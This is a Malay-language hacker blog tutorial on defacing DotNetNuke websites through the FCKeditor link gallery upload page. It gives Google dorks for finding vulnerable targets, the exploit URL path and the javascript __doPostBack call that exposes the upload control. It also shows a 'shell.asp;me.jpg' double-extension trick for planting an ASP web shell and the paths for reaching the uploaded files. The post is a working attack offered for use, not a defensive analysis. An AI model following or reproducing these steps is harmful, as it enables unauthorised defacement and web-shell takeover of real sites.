Assalamualaikum dan salam sejahtera...rasanya dah lama tak update blog kan??huhuhu...sorry yer....bz sket...baiklah hari ini aku nak ajar cara nak deface dengan DNN iaitu singkatan kepada DotNetNuke.Trick ni bole diketegorikan sebagai dah "lapuk".So ada sesetengah website ja yg masih vuln terhadap exploit ni.Tuto ni sebenarnya Zul Phc yg request.Baiklah aku pun malas nak terang2 lagi jom tngok step2 dibawah.
1. Cari vuln web dengan menggunakan google dork dibawah :
- inurl:portals/0/
- inurl:tabid/176/Default.aspx
- inurl:fcklinkgallery.aspx
- inurl:/fck/fcklinkgallery.aspx
Search di google dan pilih satu website.
2. Potong setengah link target seperti ini --> http://www.target.com/
3. Tambahkan exploit dibawah di URL dan tekan enter :
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Contoh :
http://www.target.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
4. Akan keluar seperti gambar dibawah :
Dan akan keluar seperti gambar dibawah :
6. Kemudian padam SEMUA URL di address bar.
7. Masukkan JavaScript ini pada link yang dipadam tadi :
javascript:__doPostBack('ctlURL$cmdUpload','')
ENTER!
note: bagi pengguna google chrome anda perlu type balik javascript ini...jika anda paste ianya tidak akan menjadi.
Dan akan keluar seperti gambar dibawah.perhatikan kotak merah :
Choose file, pilih deface anda, dan tekan Upload Selected File.
Supported Files:
*. docx, *.xlsx, *.pptx, *.swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.spin
note: anda jugak boleh mengupload shell asp dengan extension seperti ini : shell.asp;me.jpg
9. Untuk tngok hasil deface anda cuma perlu masukkan link seperti dibawah :
http://www.target.com/portals/0/defaceanda.txt
atau tengok shellhttp://www.target.com/portals/0/shell.asp;me.jpg
10. DONE!!!
Credit To : Newbie3viLc063s Crew, IndiXperts
Baiklah itu sahaja untuk kali ini....semoga berjaya!!!Assalamualaikum...
